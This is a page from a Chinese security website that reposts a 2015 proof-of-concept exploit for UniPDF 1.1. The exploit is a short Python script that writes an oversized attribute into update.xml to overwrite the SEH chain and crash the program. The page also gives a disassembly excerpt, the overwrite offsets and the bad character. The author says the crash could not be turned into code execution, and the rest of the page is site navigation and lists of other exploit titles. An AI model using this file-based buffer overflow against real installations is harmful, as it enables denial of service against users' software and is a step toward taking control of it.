首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
UniPDF 1.1 - Crash PoC (SEH overwritten)
来源:dungvtr@gmail.com 作者:bonze 发布时间:2015-01-30  
# Exploit Title: UniPDF v1.1 BufferOverflow, SEH overwrite DoS PoC
# Google Dork: [none]
# Date: 01/28/2015
# Exploit Author: bonze
# Email: dungvtr@gmail.com
# Vendor Homepage: http://unipdf.com/
# Software Link: http://unipdf.com/file/unipdf-setup.exe (Redirect to: http://unipdf-converter.en.softonic.com/download)
# Version: 1.1
# Tested on: Windows 7 SP1 EN
# CVE : [none]

# Note:
# Function MultiByteToWideChar will overwrite RET and SEH pointer, but I can't make exception occur before StackCookie checking
# Please tell me if you have any ideal

#013E8012  |.  68 00020000   PUSH 200                               ; /WideBufSize = 200 (512.)
#013E8017  |.  8D8C24 9C0000> LEA ECX,DWORD PTR SS:[ESP+9C]         ; |
#013E801E  |.  51            PUSH ECX                                 ; |WideCharBuf
#013E801F  |.  52            PUSH EDX                                 ; |StringSize
#013E8020  |.  50            PUSH EAX                                 ; |StringToMap
#013E8021  |.  6A 00         PUSH 0                                   ; |Options
#013E8023  |.  6A 00         PUSH 0                                   ; |CodePage = CP_ACP
#013E8025  |.  FF15 54B45101 CALL NEAR DWORD PTR DS:[<&KERNEL32.Multi> ; \MultiByteToWideChar
#013E802B  |.  8D87 08020000 LEA EAX,DWORD PTR DS:[EDI+208]


# At Offset: 327-> overwrite nSEH
# At Offset: 329-> overwrite SEH
# badchar = 0x22

buff2 = "A" * 325
buff2+= "CC" # nSEH
buff2+= "BB" # SEH
crash2   = "<config>\n"
crash2 += "    <current Dat=\"1422420474\" />\n"
crash2 += "    <Dat Txt=\""+buff2+"\" />\n"
crash2 += "</config>\n"

# Copy file update.xml to UniPDF Application Folder and run UniPDF.exe
file = open("update.xml","w")
file.write(crash2)
file.close()

print "UniPDF v1.1 Crash PoC by bonze at FPT-IS"
print "Email: dungvtr@gmail.com"
print "File Created"

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·OS X < 10.10.x - Gatekeeper by
·Microsoft Windows Server 2003
·VSAT Sailor 900 - Remote Explo
·McAfee Data Loss Prevention En
·Exim ESMTP GHOST Denial Of Ser
·ManageEngine Multiple Products
·ClearSCADA - Remote Authentica
·ManageEngine Multiple Products
·FreeBSD Kernel Crash / Code Ex
·MS15-004 Microsoft Remote Desk
·Qualys Security Advisory - gli
·Internet Explorer 11 Same Orig
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved